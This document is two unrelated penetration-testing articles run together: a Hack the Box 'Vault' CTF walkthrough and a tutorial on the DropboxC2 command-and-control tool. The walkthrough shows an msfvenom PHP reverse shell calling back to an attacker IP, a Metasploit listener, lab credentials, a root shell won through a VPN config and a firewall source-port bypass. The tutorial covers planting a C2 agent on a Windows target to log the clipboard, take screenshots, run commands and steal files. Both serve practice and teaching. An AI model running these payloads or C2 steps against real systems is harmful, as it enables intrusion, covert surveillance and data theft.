Hack the Box Vault: Walkthrough

Today we are going to solve another CTF challenge, “Vault”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their own experience level; Hack the Box maintains a collection of vulnerable labs as challenges, from beginner to expert.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of Vault is 10.10.10.109.

Penetrating Methodology

  • Network scanning (Nmap)
  • Surfing the IP address on the browser
  • Surfing directories on the browser
  • Using dirb for directory scanning
  • Creating Payload using msfvenom
  • Getting Meterpreter Session
  • Enumerating through directories
  • Getting SSH login credentials
  • Logging into SSH
  • Pinging Host IP
  • Scanning Ports on Host IP
  • Dynamic Port forwarding with SSH
  • Updating VPN Configuration file
  • Executing Netcat listener
  • Finding user.txt
  • Getting SSH login credentials
  • Using proxy command option
  • Escaping restricted shell
  • Using gpg to decrypt root.txt.gpg file
  • Converting the file to a base64 string using python3m
  • Using echo and base64 to decode the string
  • Reading our Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.
nmap -p- -sV -sC 10.10.10.109


As port 80 is running HTTP service, we open the IP address in the web browser.


The page mentions Sparklays, so we tried opening /sparklays on the machine’s IP in the browser, but it returned 403 Forbidden.

The page itself shows nothing useful, so we enumerate the web service further with a dirb scan.

The dirb scan turns up a useful page, /design/design.html, which we open in the browser. The only thing to do on this page is to click Change Logo.

That takes us to a file upload page.

We use msfvenom to generate a malicious PHP file and save it with a .php5 extension, an alternative extension that the web server still executes as PHP.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5


We have successfully uploaded the malicious file.


Meanwhile, we set up a listener with the Metasploit framework.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run


Now we open the uploaded file in the browser to trigger it.


That gives us a meterpreter session.
sysinfo


While looking for the first flag, we find files on dave’s desktop that hold useful SSH credentials:
Username- dave
Password- Dav3therav3123
cd Desktop
ls -al
cat Servers
cat key
cat ssh


Time to log in over SSH with those credentials.
Username- dave
Password- Dav3therav3123



We use ping to find the live hosts on the internal subnet 192.168.122.0/24 (with a one-second timeout so silent hosts do not stall the loop).
for i in {1..255}; do ping -c 1 -W 1 192.168.122.$i | grep 'from' ; done


Next we scan the ports of 192.168.122.4 to see what we are up against.


Now we reconnect to the machine with SSH dynamic port forwarding, which gives us a SOCKS proxy on local port 8080 that tunnels traffic into the internal network.
ssh -D 8080 dave@10.10.10.109
Password- Dav3therav3123


We point the browser’s proxy at socks5://127.0.0.1:8080.
Then we open 192.168.122.4 in the browser to see where it takes us, and click the VPN Configuration link.


This leads to a page where we can update the VPN configuration file; the Test VPN link shows the details of the existing configuration.


We paste those details in and modify them so that the VPN connects back to the IP address of the machine our listener runs on, on port 1234, then click Update file.


Meanwhile, we start a netcat listener on port 1234.
nc -lvp 1234
We get a root shell straight away. Now we enumerate directories to find user.txt.
cd /root
ls
ls -al


After some digging, we find the first flag in dave’s home directory.
ls
cd dave
ls
cat user.txt


We were out of hints, so we turned to the logs, and there we found something interesting: the firewall accepts inbound traffic from source port 4444/tcp to host 192.168.5.2, which is listening on 987/tcp.
To find out what runs on 987/tcp, we connect with ncat, using -p to set our source port to 4444 so the firewall lets the connection through.
ncat -p 4444 192.168.5.2 987
It turned out to be an SSH service.
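As an added example that is not part of the original walkthrough, the two checks above (the port scan of 192.168.122.4 and the source-port-pinned probe of 192.168.5.2:987) done in Python: a plain TCP connect scan that needs no root, and a banner grab that binds the client’s source port the way ncat -p 4444 does, which is exactly what a firewall rule keyed on “from port 4444/tcp” matches on. The listener it talks to is a constructed stand-in that answers with a made-up SSH banner so that everything runs offline; the hosts, ports and banner text are assumptions, not values from the box.

```python
import socket
import threading

# Constructed stand-in for the banner a real SSH server sends; not from the box.
FAKE_BANNER = b"SSH-2.0-OpenSSH_7.6p1 Ubuntu-4\r\n"


def tcp_scan(host, ports, timeout=0.5):
    """Return the ports in `ports` that accept a TCP connection on `host`.

    A connect() scan: no raw sockets or root required, which is all you have
    from an unprivileged pivot shell.
    """
    open_ports = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            open_ports.append(port)
        except OSError:  # refused, timed out or unreachable
            pass
        finally:
            s.close()
    return open_ports


def grab_banner(host, port, source_port=None, timeout=2.0):
    """Connect to host:port and return the first line the service sends.

    If `source_port` is given the socket is bound to it before connecting,
    which is what `ncat -p <port>` does. A firewall rule allowing traffic
    "from port 4444/tcp" matches on exactly this value, so the pivot only
    works when the client controls its source port.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    if source_port is not None:
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(("", source_port))
    try:
        s.connect((host, port))
        return s.recv(256).decode("ascii", "replace").strip()
    finally:
        s.close()


def free_port():
    """Ask the kernel for an unused local port (and release it again)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def start_fake_ssh(seen_source_ports):
    """Listen on an ephemeral localhost port, greet every client with
    FAKE_BANNER and record the source port each client connected from."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, peer = srv.accept()
            seen_source_ports.append(peer[1])
            try:
                conn.sendall(FAKE_BANNER)
            except OSError:  # a scanner that closed right after connecting
                pass
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Scan one open and one closed port, then grab the banner from a fixed
    source port and confirm the server saw that port."""
    seen = []
    service = start_fake_ssh(seen)
    closed = free_port()
    src = free_port()
    found = tcp_scan("127.0.0.1", [closed, service])
    banner = grab_banner("127.0.0.1", service, source_port=src)
    return {
        "open_ports": found,
        "service": service,
        "banner": banner,
        "source_port": src,
        "seen_source_port": seen[-1],
    }


if __name__ == "__main__":
    print(demo())
```

Against the real targets you would call tcp_scan("192.168.122.4", range(1, 1025)) from dave’s shell and grab_banner("192.168.5.2", 987, source_port=4444) from 192.168.122.4; the same connect() with the source port left to the kernel is what the firewall drops.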


In the ssh file we again find credentials for an SSH login.
Username- dave
Password- dav3gerous567
cat ssh



Time to log into SSH; here we again find user.txt.
ssh dave@192.168.122.4
Password- dav3gerous567
ls
cat user.txt


The firewall only admits connections to 192.168.5.2:987 that come from source port 4444, so we log in with an SSH ProxyCommand that wraps the connection in ncat -p 4444.
ssh -o 'ProxyCommand ncat -p 4444 %h %p' -p 987 dave@192.168.5.2


After logging in as dave we find ourselves in a restricted shell and cannot change the SHELL variable. Once we spawn a proper TTY with python and start bash from it, the SHELL variable can be changed.
echo $SHELL
export SHELL=/bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
bash
export SHELL=/bin/bash



We tried decrypting the file root.txt.gpg but could not, since the secret key it was encrypted to is not available on this machine.
gpg -d root.txt.gpg


There are not many options left, so we convert the file to a base64 string using python3m so that it can be copied out through the terminal.
python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()).decode())"


We copy and paste the encoded string to the ubuntu machine and decode it there with base64. Since we found the passphrase ‘itscominghome’ earlier, we can now open root.txt.gpg and read the final flag.
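As an added example (not from the walkthrough), a small helper for the copy-and-paste transfer above: it wraps the base64 output into short lines, since one long line is easy to truncate in a terminal, and prefixes a SHA-256 of the original so the receiving side can prove the pasted file is byte-identical before trying to decrypt it. The sample bytes are constructed for the demo and stand in for root.txt.gpg.

```python
import base64
import hashlib


def pack_for_paste(data, width=76):
    """Base64-encode `data`, wrap it at `width` columns and prefix a SHA-256
    line; this is what you print on the source host and copy out."""
    digest = hashlib.sha256(data).hexdigest()
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + width] for i in range(0, len(b64), width)]
    return "sha256:" + digest + "\n" + "\n".join(lines) + "\n"


def unpack_from_paste(text):
    """Reverse pack_for_paste on the destination host.

    Raises ValueError when the paste is not the exact original: a dropped line
    shows up as bad padding, a stray prompt character as an invalid symbol,
    and anything subtler as a hash mismatch.
    """
    header, _, body = text.partition("\n")
    if not header.startswith("sha256:"):
        raise ValueError("missing sha256 header")
    expected = header[len("sha256:"):].strip()
    # base64.b64decode raises binascii.Error (a ValueError subclass) on bad input
    data = base64.b64decode("".join(body.split()), validate=True)
    if hashlib.sha256(data).hexdigest() != expected:
        raise ValueError("sha256 mismatch: paste is incomplete or corrupted")
    return data


def paste_is_intact(text):
    """True only if `text` unpacks to bytes matching its own checksum."""
    try:
        unpack_from_paste(text)
        return True
    except ValueError:
        return False


# Constructed sample standing in for root.txt.gpg; not the file from the box.
SAMPLE_FILE = bytes(range(256)) * 3


if __name__ == "__main__":
    blob = pack_for_paste(SAMPLE_FILE)
    print(blob)
    print("round trip ok:", unpack_from_paste(blob) == SAMPLE_FILE)
```

Run pack_for_paste over the file on the source host, paste the output into a file on the destination host and feed it to unpack_from_paste; when Python is not available on one side, sha256sum on both ends gives the same check for the plain echo | base64 -d route.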


Finally, we have read our Final Flag.
gpg -d root.txt.gpg


Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, with 2.5 years in the field of security as a Penetration Tester and Forensic Computer Analyst.

Command and Control with DropboxC2


In this article, we will learn how to use DropboxC2 tool. It is also known as DBC2.
Table of Contents:
Introduction
Installation
Getting Dropbox API
Exploiting Target
Sniffing Clipboard
Capturing Screenshot
Command Execution
File Download

Introduction
DBC2 is primarily a post-exploitation tool. It consists of an agent running on the target’s machine, a controller running on any machine, PowerShell modules, and Dropbox servers as the communication channel. It is inspired by the PowerShell Empire framework and is written in Python. Credit for developing the tool goes to Arno0x0x.
For this particular demonstration,
Attacker: Kali Linux
Target: Windows 10
Installation
To begin, we need the tool on our attacker machine, so we clone it directly from GitHub.
git clone https://github.com/Arno0x/DBC2


After running the above command we have a directory named DBC2. We move into it with cd and install the tool’s dependencies. There are several ways to do this; here we use pip with the requirements.txt file that came with the clone.
cd DBC2/
pip install -r requirements.txt


Getting Dropbox API
This tool uses the Dropbox servers as the medium for controlling the agents on the target machine, so it needs a Dropbox API access token. First create a Dropbox account, then head to the Dropbox developer tools. A webpage similar to the one shown below opens. Select “Dropbox API”, choose “App folder” under the type of access, name the app as you like and click Create App to proceed.


This leads to another webpage, shown below. Move to the OAuth 2 section and click Generate access token. This gives us the Dropbox API token required for this practical.






Copy the generated access token and go back to the directory we cloned earlier. It contains a file named config.py; open it with nano and paste the access token as the value of “defaultAccessToken”, as shown in the screenshot below.

Exploiting Target
Now it is time to run the tool; check that you have the required permissions on the directory before running it. On start-up we are greeted with a banner, followed by details about the author and version of the tool. It then asks for a master password, which is used to encrypt all data exchanged between the agents and the controller. Enter a password of your choice: the tool hashes it and displays the result, and that value can be added to config.py so it does not ask for the master password again. It also creates an incoming directory inside the cloned directory, which is used as a buffer for files retrieved from the target.
python dropboxC2.py



The tool needs the modules and the stage uploaded to Dropbox before going further. We do this with the command below.
publishStage dbc2_agent.exe


This uploads the file to Dropbox, as shown in the image below, XOR-encrypted with a key. Keep in mind that XOR with a repeating key only obfuscates the agent from casual inspection; it is not strong encryption, and anyone who retrieves the blob can recover the key from the predictable bytes of an executable.
Now let’s check that the stage is published using the command below:
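An added example, not DBC2’s own code, of what “XOR encryption” of a stage amounts to and why it only obfuscates: a repeating-key XOR encoder, plus two ways a defender who pulls the blob off Dropbox can get the key back without it, from the known “MZ” bytes at the start of any Windows executable and from the run of zero bytes that every PE header contains. The stage bytes and the six-byte key are constructed for the demo; what DBC2 actually derives its key from, and how long that key is, are not shown on the page and are not claimed here.

```python
from collections import Counter


def xor_bytes(data, key):
    """XOR `data` with `key` repeated; the same call encodes and decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key_prefix(ciphertext, known_plaintext):
    """Known-plaintext attack: c ^ p == k at every position where the
    plaintext is known. A PE file always starts with b"MZ", so the first
    two key bytes fall out immediately."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))


def recover_key_by_zero_bytes(ciphertext, key_len):
    """Recover a repeating key of length `key_len` without any known offset.

    PE headers and padding are mostly 0x00, and 0x00 ^ k == k, so for each
    key position the most common ciphertext byte at that stride is the key
    byte itself. This works whenever zeros dominate each stride, which is
    true of a real binary for any plausible small key length.
    """
    key = bytearray()
    for offset in range(key_len):
        stride = ciphertext[offset::key_len]
        key.append(Counter(stride).most_common(1)[0][0])
    return bytes(key)


# Constructed stand-in for an agent executable: a PE-like header, the DOS stub
# string, and the zero-heavy padding real headers carry. Not a real binary.
SAMPLE_STAGE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"This program cannot be run in DOS mode.\r\n$"
    + bytes(300)
    + bytes(range(0, 256, 3))
)
SAMPLE_KEY = b"s3cret"  # assumed demo key, not a DBC2 value


def demo():
    """Encode the sample stage, then recover the key both ways."""
    blob = xor_bytes(SAMPLE_STAGE, SAMPLE_KEY)
    return {
        "round_trip_ok": xor_bytes(blob, SAMPLE_KEY) == SAMPLE_STAGE,
        "key_from_mz": recover_key_prefix(blob, b"MZ"),
        "key_from_zeros": recover_key_by_zero_bytes(blob, len(SAMPLE_KEY)),
    }


if __name__ == "__main__":
    print(demo())
```

When the key length is unknown, run recover_key_by_zero_bytes for lengths 1 to a few dozen and keep the one whose strides each have a clearly dominant byte; once the key is out, xor_bytes gives back the agent for analysis and a detection signature.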
listPublishedStage


Now that the stage is uploaded, we use it to create a stager. Here we create a batch file, but there are many other stager types: the tool can produce a macro, a one-liner, JavaScript, an MSBuild .sct and more. This command creates stager.bat in the tmp directory, which we then deliver to the target machine.
genStager batch default


After the batch file is executed on the target machine, the terminal reports “Agent found” with an ID. We use the list command to see the agents, then copy the AgentID and use it to interact with the session as shown in the image.
list
use [AgentID]


This will create a file on the Dropbox with the .status extension as shown in the given image.


Clipboard Sniffing
We can capture the data on the target’s clipboard, that is, whatever he or she has copied. To do this we start a sniffer with clipboardLogger start, wait until the target copies some data, then stop it with clipboardLogger stop. After the sniffer is stopped the clipboard contents are saved to a text file in the incoming directory.
clipboardLogger start
clipboardLogger stop


Let’s take a look at what the target copied. We use cat in a new Kali terminal to read the file, as shown in the given image.
cat /root/DBC2/incoming/clipboardlogger.txt


Capturing Screenshot
Furthermore, we can grab a screenshot of the target machine with the screenshot command, as shown in the given image.
screenshot


The screenshot will be captured and stored in the incoming directory. We can see that the target is browsing a website on his/her machine in the given image.


Command Execution
We can run PowerShell commands on the target machine with cmd. The tool does not provide an interactive shell; it executes one command at a time, so we type cmd and it prompts for the command to run. Here we run dir and get the list of files, as shown in the given image.
cmd
dir

File Download
Furthermore, we can download files from the target with the getFile command followed by the file name or path. This downloads the file from the target to our attacker machine.
getFile sharetext.txt


The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.
cat /root/DBC2/incoming/sharetext.txt